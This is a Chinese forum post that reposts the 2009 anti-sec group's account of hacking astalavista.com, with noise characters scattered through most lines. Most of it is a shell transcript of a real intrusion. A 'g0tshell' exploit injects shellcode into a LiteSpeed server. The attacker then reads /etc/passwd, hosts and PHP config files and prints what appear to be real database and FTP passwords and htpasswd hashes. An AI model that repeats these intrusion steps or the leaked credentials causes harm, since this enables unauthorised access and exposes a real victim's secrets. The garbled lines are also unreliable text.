里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
' }% H/ R, r6 |: T" }/ A: i; ^* p& o8 \3 W9 U: j
[root@front3 ~]# curl -I litespeedtech.com5 h1 ]; g9 C& q" k1 N
HTTP/1.1 200 OK& \+ }$ N7 K7 S( q6 q
Date: Fri, 05 Jun 2009 22:54:51 GMT; ]6 E+ ], H1 o3 J7 J* {
Server: LiteSpeed4 Y; f$ T8 O; c- v
8 U# z9 k( w% B ]9 u另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-1 h# y& Z: x" S1 Z9 o' ?
0 Y* J( R' ?: i d
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。+ A3 G% ?0 b9 p2 b# d! d
3 o: j( V) x; j. Z9 v, _6 O3 b2 X+ L6 I2 Y$ `0 V5 S3 w3 z) P# H
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ % p( L8 ^/ D m# @# H8 Z7 W
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \% f# d' W+ A9 x) }8 ~- L
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \+ K: ?- j7 K6 ]/ w( c, G
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
! C" ]" h8 a( l" z: J7 A \/ \/ \/ \/ \/ \/ \/ x& {, C* d( U, ?. [
The Hacking & Security Community
3 \' o8 p/ [$ K5 q" W[+] Founded in 1997 by a hacker computer enthusiast9 l5 J# n1 Q7 Z5 F8 ~% s- I, i
[-] Exposed in 2009 by anti-sec group L, O" y+ f6 {7 |6 S
( a7 s. T e0 c2 a/ ]
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
7 j- Y3 t/ ]: ?8 g0 F>> 03. Who’s behind the site?: f# F; ?% S2 q1 c: a
>>7 T8 L0 j3 }; j6 p
>> A team of security and IT professionals, and a countless number of contributors from all over the world.8 c! s+ n% `! K. p7 c
7 p/ R; m7 w2 U1 y' A* n
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?! `; `& F3 b; S, S1 H4 K
>>
8 {( Z. W/ x ?, |3 w>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
1 X* F' |6 X6 [. V" q: ]military institutions.
7 M3 @# o8 p" z* g6 O7 W+ c3 i1 C7 q>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
$ { H; w( L9 l$ v) J% ^: Y
0 q/ b7 g6 g+ u8 {Why has Astalavista been targeted?0 H. j0 i8 p7 ~, t
' p U" l5 O _" r! I0 N& yOther than the fact that they are not doing any of this for the “community” but; I4 w4 _* a: @, k$ x5 j+ z% }
for the money, they spread exploits for kids, claim to be a security community
6 }( U" b9 L! ~ p6 T; T" B3 \$ i: U(with no real sense of security on their own servers), and they charge you $6.66
% L8 F# Y* S) r! yper months to access a dead forum with a directory filled with public releases
, q1 e# ]5 v- nand outdated / broken services.
8 {1 j% p% L- U
+ p! J% A5 x0 u6 F, ^7 SWe wanted to see how good that “team of security and IT professionals” really is.
?1 c8 `$ b+ n, S2 U
* q4 O8 Y* o8 C3 c: a; KLet’s begin.; j7 n8 {! B. N( [! S, {5 q
$ z. m6 R8 a: } |3 a! N: M$ ?4 a2 e
anti-sec:~# ./g0tshell astalavista.com -p 80" n7 |3 N9 s: S
[+] Connecting to astalavista.com:80
* U: T3 p6 n5 ~' E[+] Grabbing banner…: m/ h8 l, G t, B
LiteSpeed! b- m; C/ n8 N: Z- n
[+] Injecting shellcode…3 O: R u$ O/ g- d, V$ O
[-] Wait for it
' Q. S8 s) N) E' d! T# }! u* _/ d- `( G3 O) |9 o" \
[~] We g0tshell0 g9 B6 V0 {5 d% J
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux) ~( b/ W& o& x7 S
ID: uid=100(apache) gid=500(apache) groups=500(apache)
5 V7 `+ Z' }- x
6 _4 x! V4 q2 \% Ksh-3.2$ cat /etc/passwd
+ c" T. m I* Nroot:x:0:0:root:/root:/bin/bash1 Y6 b* m% e; J; E/ w. ?$ I
bin:x:1:1:bin:/bin:/sbin/nologin+ Z4 ], |7 ~& Q- m; c6 A2 h
daemon:x:2:2:daemon:/sbin:/sbin/nologin
# Z6 w, O' I6 r( cadm:x:3:4:adm:/var/adm:/sbin/nologin
+ ~' N+ Z: ?9 W; T4 J) tlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin4 ]+ W( f$ d+ [: o3 M. S: J
sync:x:5:0:sync:/sbin:/bin/sync
/ T! d9 ~+ {" p' ishutdown:x:6:0:shutdown:/sbin:/sbin/shutdown& z5 y0 ~# ^. L+ F- q
halt:x:7:0:halt:/sbin:/sbin/halt: |7 k7 i& a" u2 g" C& K+ J
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin' B! U9 D! [" b; M
news:x:9:13:news:/etc/news:
7 n; R9 ]; E5 H' E9 [uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin( ~$ R1 _1 G R8 ~0 W2 q
operator:x:11:0 perator:/root:/sbin/nologin6 h1 t, v/ n/ D8 v t
games:x:12:100:games:/usr/games:/sbin/nologin
R' Y9 ]: j" d/ s; Wgopher:x:13:30:gopher:/var/gopher:/sbin/nologin' E8 b9 o# a0 z# P; L
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
1 c) C, e" \8 A9 s+ Onobody:x:99:99:Nobody:/:/sbin/nologin
# |$ S7 @$ }) T7 k- _. L& N( grpm:x:37:37::/var/lib/rpm:/sbin/nologin9 k0 I, u2 R0 N+ p: y% n$ B
dbus:x:81:81:System message bus:/:/sbin/nologin$ |/ s* ]6 b7 S4 H$ [) }
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
2 o q2 P- A$ Y. ]mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin- Y; L0 e5 a# z5 f! y5 N7 ?' S
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin+ r5 c1 C6 b, p& m1 O
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin: ~& Z* d4 ?9 Y1 J+ l/ X8 x3 C
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
% i8 l* H A1 o7 Jrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin2 k6 D. P! p" O/ D5 r
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin4 e1 F7 M# H- Q' g, b- @# l
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
( ~( i+ b/ k% L$ {sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin* T3 y. n, Z# |4 u
pcap:x:77:77::/var/arpwatch:/sbin/nologin& v! k% v( t& {% c9 B9 l
named:x:25:25:Named:/var/named:/sbin/nologin. @1 C: b W( y( M0 c( {- y
apache:x:100:500::/var/www:/bin/false
, H2 q. j( F8 ?6 m+ O# o; Fdiradmin:x:101:101::/usr/local/directadmin:/bin/bash- v; }8 V, R9 z
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash# K9 q2 B3 [0 C2 T0 p# Z- I
webapps:x:500:501::/var/www/html:/bin/bash! _% ]# s! ]' G
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash' s& V2 n4 G( g! S
admin:x:501:502::/home/admin:/bin/bash& e- { ^+ V9 ]* Y' z) ]: O
jon:x:502:503::/home/jon:/bin/bash0 ~0 S+ y& {+ n2 e5 U: N1 e- _0 K
com:x:503:504::/home/com:/bin/bash' V% I# {; U( z( S9 E% }/ r6 s& l& @
ntp:x:38:38::/etc/ntp:/sbin/nologin0 L7 C* {/ M5 ?# Q2 w
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin0 w( U0 U3 i( p2 m8 c6 Q
astanet:x:504:505::/home/astanet:/bin/bash
& g) S9 `3 `* Gavahi:x:70:70:Avahi daemon:/:/sbin/nologin
n c3 e* e7 c3 j/ h0 G; s' uavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin* C/ {2 k4 b6 z q& p7 t
0 k: R( {9 F, }, F7 U5 ~sh-3.2$ cat /etc/hosts
4 n* A g" G1 n0 M: e$ @, S# Do not remove the following line, or various programs9 x5 m5 x8 a3 p% o% P
# that require network functionality will fail.5 V% c0 n- B" _0 ]% m c6 S
127.0.0.1 localhost.localdomain localhost
9 R' s& w2 L- X+ u( x::1 localhost6.localdomain6 localhost6
, \8 z$ ~% w, D3 S6 W4 j80.74.154.172 asta1.astalavistaserver.com2 I2 Q4 t+ ^7 W# g
9 |' ]7 s( W# o8 ?
sh-3.2$ pwd
/ D5 d0 b8 H e7 Q) Z/home/com/public_html& }9 B- D8 r3 w4 u" f; M
. o" n8 v" A' P) Z8 T8 |sh-3.2$ ls -la
@. E1 ^% m4 W$ l" w1 N8 N2 [$ p$ {, ^total 18460
& C% T7 d( q5 b- {drwxr-xr-x 30 com apache 4096 May 28 17:06 .! s* G Y) r2 P5 y4 {/ s& l* W4 R
drwx–x–x 11 com com 4096 Jun 25 2008 ..
! i$ p, G/ {0 R8 H7 T' b' ~' f5 G" _drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
7 `: Z# z7 S% I" s) O/ e6 cdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache/ a. e- h1 d! z) ^6 K! h |
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin& P) |) V" R9 r# Q
drwxrwxrwx 2 com com 4096 May 19 00:50 config
' Z6 p) s5 p5 [* T7 y0 z7 t' o2 ddrwxr-xr-x 2 com com 4096 Mar 20 11:05 core- }6 n9 G" R$ Q3 U7 y
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules& Q e& t/ Z8 x/ u* [* {% A* @& k
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
! }1 r7 Y% T" g, F! hdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
0 e2 `& t/ @4 T$ q) A" v9 L6 E% Idrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
# p" K; @+ C& [' ]# X& q* k; c-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php# F# W3 f7 k- ]8 q
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd9 f+ A/ A" R3 d
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor$ I, ^# `1 b7 x+ n
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
( S5 W' D+ Z& }* J! j. Ydrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
9 z8 H- |3 y+ N8 @* s4 |-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
, T" {( G7 }0 T8 r5 [$ P; K/ S& z-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
5 k' t7 n1 R7 ^7 `! e-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak( `0 \) Q: Y5 E
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool$ p9 |# p' C$ F0 h, S) G+ d
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images% W9 t# c) i& A% W. \& X" g
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php$ T( _$ b# C, l' ^% f
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer1 B! i8 R& _/ U7 H' R3 p9 u& M
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang5 c( N, l! x0 D6 ^' F% S
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib$ k& y3 l5 f9 J) F
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
* X* k6 I2 f( ^) U0 l" `drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
3 I0 y. m# L6 Mdrwxr-xr-x 34 com com 4096 May 28 16:30 modules" D% _/ I+ }& P- ?* d0 p! O
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
3 j" |' f/ Q' b! H4 ~/ Edrwxrwxr-x 22 com com 4096 May 28 17:06 _new! m% k6 d, k! Q. M( G3 s) J
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old; G* p+ y7 j) l0 `
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy9 c2 u5 A+ l) n5 M8 V1 D
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
+ N, f$ P0 E8 U9 o! l- x-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
0 _0 ^9 o( H [# E-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml. P$ [* w, Q7 j3 j0 M+ w
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
' u) ?% F5 {! ^, u3 pdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
4 _' D6 w% z ]drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
$ ^& d% D& |6 [: Edrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
4 Z) n8 `9 D3 N' V1 B% d6 k" S- ?2 E
sh-3.2$ head -20 index.php( F& u, a" n' T8 r0 |2 g- m
<?php
$ I/ W* m9 a* C4 d- H3 Z' K7 @' n) ~( X9 E
/**. k) }* [. g4 m8 R4 ]4 M, I# U
* The main page for the CMS
- a( F/ k0 a( Q$ g* @copyright CONTREXX CMS - COMVATION AG
3 ?/ u" H# {5 |) y; _- h, Q& Q7 Y* @author Comvation Development Team
4 [' y* g# U' K* @version v1.0.9.10.1 stable: t8 }3 X$ |; F- M& W
* @package contrexx5 D Z% T% H, Z+ h- C8 d0 R( Z1 [
* @subpackage core
^& [$ i0 x1 C% V0 G. m* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage& [" y+ G1 p& ?- j% m+ k; H
* @since v0.0.0.0
% ?5 d1 G- i& i1 w9 _* @todo Capitalize all class names in project4 n0 O; m4 N5 e4 a
* @uses /config/configuration.php
. x! E$ A0 g7 |, h7 P% W* @uses /config/settings.php
# N7 P/ n; I+ O! w- [7 F4 k# c* @uses /config/version.php. q2 z4 b/ Q2 f9 C4 p( O
* @uses /core/API.php
1 ~. U" n2 f0 c* @uses /core_modules/cache/index.class.php7 R, }7 G. X5 a% W
* @uses /core/error.class.php
1 b ?, j. |. A' I* @* @uses /core_modules/banner/index.class.php% O! }6 m2 v& S1 t4 {
* @uses /core_modules/contact/index.class.php
$ Z# @0 n* K. V9 B1 x. r
0 F$ W' K) l6 Ksh-3.2$ cd config/
9 t( o5 e! X4 V9 Tsh-3.2$ ls -la
/ W* R+ [ U; ^9 O4 N+ i, A3 M4 ?+ E- stotal 32
- M8 l9 n: _$ j+ b' i9 R0 A+ Ldrwxrwxrwx 2 com com 4096 May 19 00:50 .; G5 e- p; M! K" u( l
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 S7 T2 f5 @! O/ W4 q& A
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php6 A3 l& W/ A* Z. p+ m6 S6 {
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
; o9 ^* e8 u3 @4 n: B2 ?: a-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php* _: k# `6 u' W% R+ G1 k! y
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php( \& v- E1 p# A7 z9 O5 G
# Y4 z5 G! Q5 tsh-3.2$ cat configuration.php
0 _0 p `: B# G) g# E[snip]
) i6 {* `4 B9 K% R$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost. I' M- N; Y" y3 ^& u
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name7 j2 X- {2 ]# t3 v. Q' Q
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix9 L" D C# X: X
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username" x' z& P4 @7 L, w; ?+ c
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
+ `5 ~, Z8 R# j. [7 X" o$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
3 t( X3 M0 v i/ d# @2 c$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)& N# c# U; Z5 N0 ~* p
[snip]
+ ^5 t) T" v- i# Y: k* `$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
' K- H: ]+ ^/ A: j" Q2 D! s1 `$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode/ r0 T8 ?. G ]8 n( e/ K# f
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost" Z5 w8 M( G* z' q8 n9 t) f8 ]
$_FTPCONFIG['port'] = 21; // Ftp remote port
]+ U9 X w1 P! |- P) c, ^$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username: @" ]8 t5 t2 j6 S1 Q( Q
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password# o( M/ f3 U$ W; n" x8 `. Z1 F
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms# T6 R! b0 w: o4 z2 W
- ^8 c* k- A" O* Q
sh-3.2$ cd ..* R4 ]* {$ F- J" O# V6 B, g
sh-3.2$ cd dvd/" b! G3 @( l0 p9 `$ e0 ]
sh-3.2$ ls -la
+ o. u3 X; J( J) Ptotal 2913780
. C# g: z( e8 h2 w6 |8 M' Pdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
0 o6 ^8 b3 K$ Hdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
7 q! n; G% U7 W" u-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar& S3 h" R5 B$ w& c, Z
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar# |: Y& M7 J' R0 z: F2 ]
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
/ Q: `* V# x+ W1 r: {-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess. c+ \- T3 Z/ y) t
7 e7 G* w$ h+ p; ]
sh-3.2$ cat .htaccess
. u' k+ b, ?: _+ n2 l( VauthType Basic; I @9 N5 w8 e; P
authName DVD- l; y/ `; N& y3 ?7 n- f
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
+ D, g; C" m+ Grequire valid-user
0 u, ?# K, |9 i3 D* J9 e9 g" O {# y# I# `5 C
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
* b. I+ y, d+ _- u; NDVDdownload:CRD8cuY6.MPT6
& S3 J" S9 Y" e/ lDVDdownload2:CR8a36.wluFMg) C7 M7 j. T. [2 f
+ i# u6 f, e9 u$ I {- ]! tsh-3.2$ cat test.php7 T) M) J( \! [$ B
<?php# V9 _4 H0 r* l
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;/ \# ~& k$ M3 W8 z& L
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));: s$ {: c7 I% t. w/ m# C6 m
echo $url;
$ h; |1 N7 t2 |" W1 P+ H8 y?>
4 S7 y& T+ C4 f8 {3 ]
# J2 _- {: W% \8 g, P8 _5 w7 w7 msh-3.2$ cd modifications/6 }- r! g$ _' a) j6 p
sh-3.2$ ls -la
2 O- }+ C3 A' }total 32
0 U+ }" s2 v( B* S, v; K# E8 z- u4 vdrwxr-xr-x 8 com com 4096 May 11 12:48 .9 c3 V/ e, h5 x; P. X( ^1 w2 Q, D
drwxr-xr-x 30 com apache 4096 May 28 17:06 .., v( h, @. H, o9 L/ ]' e3 C
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
; Z0 x7 }/ g& L, C+ Cdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs9 Y; Q! x: C H$ t* Y8 z
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools) Q A! f& b$ T) j3 F* M7 \
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc# ] G! w5 F% ?. F. J* i( `
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
2 O, h/ i( X/ @+ Fdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp4 D$ s5 M1 R7 _" V( l; H
8 G4 H7 U0 \2 A7 ?" ?sh-3.2$ ls -R( v# b/ \4 G: Z3 A. z0 q
.:
! f( V$ D" I, Acom_avtng cronjobs onlinetools pjirc search _tmp! `0 e7 v2 J' l5 o* _( R
7 L. n$ \" n* U6 l. ]" u) ]& n S./com_avtng:
: d: c3 ]: }6 U9 Z2 s, Zavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts+ j/ _- E4 O+ Y8 c5 s& y
' Z# a B2 ]+ [
./com_avtng/scripts:- y& f% q. |5 S; z/ b
popunder.js
" E, A# J9 z, `2 d* k4 J% D" t& p1 y2 Z/ e- o
./cronjobs:
& @, Z( ]9 Z1 h8 K2 Texploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
. j. X6 X j+ u3 N; l
/ w, e9 O4 X$ e* N./cronjobs/tmp:
' E2 \2 A# Y/ K7 Rcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
; s$ T" q' ]6 j* F5 ], @6 m& {# f# C+ F' f7 M% N
./onlinetools:
4 o$ e6 T/ c& Z- y/ h" Findex.php" p6 U5 b" { u& ~
- b0 M- N9 n7 L./pjirc:
+ M* v8 i, U/ Q$ M- i: A g5 M+ ?a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt/ V- O. R5 O; K C2 j
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt/ Y( ?$ O( A6 u2 q1 {* o6 s
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
c S$ e7 y' S$ H. d
5 G' b# I( J0 }. y./pjirc/img:
9 k9 I% I* F8 ^2 O" w5 Z5 ~( wange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
3 Y f7 m8 G( X2 w; F# K( _arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif , a* p& r- H2 ~: m$ E
verre-eau.gif( B, f, i" s. s4 T7 \
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
, |! V2 _! v0 F' @) Nverre-vin.gif
: O* s% h! m H0 e" \- @ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif9 w. g3 H# z; ~0 S/ c
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
6 @! ]( m2 D8 n% o e- l2 ~+ n8 S# v" @* B0 d
./pjirc/snd:
% b+ R! G1 E" t2 h1 j# P |3 K8 ]9 ebell2.au ding.au
S' {8 i! J# \+ x) T: e( o% L/ Y- U+ s) ]9 s2 ]
./search:
0 r1 S! t/ A: p8 y7 Y1 I8 [ [/ g, zsearchEngines.php search.php* ?' \& X/ q3 l" V3 ^( N M4 p+ E
, x* }( r- V5 `
./_tmp:
: E2 |: d% G7 j9 O* o5 LdefaultPorts.php defaultPorts.txt3 ?3 M* @2 u' V7 S& }
V4 ?# k+ D( T" H4 |$ S% Vsh-3.2$ cd cronjobs/" @7 g+ Q# ~$ v* v3 }6 s
sh-3.2$ cat exploits.php
- H$ u) v0 b) N) ?9 l/ z* p# I/ U[snip]
! @! n" v* q5 d7 j( ]$categories = array();1 A* f1 X, }" Q" I! ]& \
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;5 U& D5 q6 b4 w0 B- R" N7 E2 Z- d
$expolits = file($milw0rmFile);7 O7 f$ G b6 `# \, q
$comExploits = array();7 N/ ]* V% o- ?# ~ o1 U
[snip]) ^% I- T! {, w
// manage data! \- V7 y9 ^8 s$ n9 T4 o Y' y
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+ T$ S' H& n# Y2 ^
& }6 _- c$ p0 H$ t% E# a s // get path and title
) T9 \! ]' \9 i7 e, G $expolits[$x] = trim($expolits[$x]);
$ U) v- N; }5 [3 b $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));$ ?5 V3 {1 q9 F& _7 @$ w/ ]" t( z
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
$ B% n1 A" e. E& R
! Y7 u7 s) [: e$ G // check if file exists
% T2 R$ i0 P) I3 g3 t4 Q if (file_exists($path)) {6 H- \) `$ H) z: s3 u1 ]
3 t& v+ Z0 s) ]% V! n' }5 X4 q
$text = file_get_contents($path);, {; z) f, _* Z1 q- i5 G! b
6 B p$ [$ @& W1 L. C // get content and date+ y* y' x* [* h/ g
//$text = htmlspecialchars($text, ENT_QUOTES);) O1 y) m+ ?, s, E, H: P
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
7 i& h4 N' X) _$ S; S% n2 j) N if ($tmptext != ”) {2 P9 D0 } |6 o4 i
$text = $tmptext;7 t9 Y3 c$ T7 b6 v$ c
} else {! ] b+ n/ U( H; {6 h) v8 |
$text = addslashes(htmlentities($text, ENT_QUOTES));
5 O' v M* }6 B4 T }
' x9 H3 ^" M& s $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
, t7 y9 c: S. h& P3 u$ ^6 A $tmp = explode('-', $date);
7 c+ }0 w. Q( c) G/ g4 U" x $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));- f% @7 n, V% a3 H/ ^( m9 ]
$cat = getCategory ($path);" M' _( c* M" ^
$ext = pathinfo(basename($path));" _6 U# j4 D- P2 p3 T5 W
$ext = $ext['extension'];8 M: Y+ L/ O5 g, X4 u- @ K3 \+ o- Z
$qStr = ”
8 v$ ^8 J4 r2 L) l4 ]7 e SELECT `id`9 r' \- }% P6 } C- N: E2 E. Y' `
FROM `contrexx_module_exploits`! c3 O; B/ ]( O s) s. r+ X; O
WHERE `title` = ‘” . $title . “‘% g1 U) ?& O4 L& B; O
AND `date` = ‘” . $date . “‘
5 `$ ]" j$ s7 E+ V “;1 ]* ?" n4 J5 l) w, x- f% C" z
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
, V3 ]/ b5 m5 k) V t $q = $_objDB->query($qStr);1 l4 @* p% z& N2 Q3 ~: v, l! w
% R; r) ~+ m0 ], [* J5 V& d( F1 r
if ($q->numRows() == 0) {
# |% }1 k! U7 Y, T* x4 _3 S, _8 P# p7 S( d* G/ f# a
// prepare array
S2 p& j- H& r4 X $comExploits[$x]['date'] = $date;' R' H9 D0 Y; V* z; z
$comExploits[$x]['title'] = $title;- m" f6 H5 w) [* r, \5 Z% D# ]2 X
$comExploits[$x]['author'] = ‘milw0rm’;
+ K4 Q( D( }" |! Q $comExploits[$x]['text'] = $text;0 t7 t' i, D, X' s, ?9 X
$comExploits[$x]['source'] = $ext;& R& o9 @6 L3 Q9 `" c- k
$comExploits[$x]['url1'] = ”;; G: J+ i) R2 Y% u. V
$comExploits[$x]['url2'] = ”;' m" S3 D- _! G7 S! a" _$ L
$comExploits[$x]['catid'] = $cat;2 s4 V8 Q7 d0 H
$comExploits[$x]['lang'] = ‘2′;- L5 C0 H9 K2 s5 s6 Q6 C
$comExploits[$x]['userid'] = ‘12′;8 `0 E( v' D% t7 @9 D6 l$ t
$comExploits[$x]['startdate'] = ‘0000-00-00′;
; D' v, X. z9 o0 r8 P $comExploits[$x]['enddate'] = ‘0000-00-00′;
+ X, W1 z& A% }7 _, b $comExploits[$x]['status'] = ‘1′;, ?% n. o; y- [; n
$comExploits[$x]['changelog'] = $date;
- j& c' `8 s% c1 o$ ~! C; P; A" @1 `8 p: A
}9 I0 @3 c3 h i1 x# N
[snip]
0 D& b `' u; H4 }5 R $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
9 p; O& {9 J1 a, f$ @1 [9 O<rss version=”2.0″>/ i; @7 s: T" P3 w
<channel>
9 N7 C& k K, Z# C6 S5 D& L1 @ <title>ASTALAVISTA.com - Exploits</title>
& K( [! i i$ A6 u% u) K5 g' T <link>http://www.astalavista.com/exploits</link>% |& d" M: q1 {/ ]5 |2 L( n
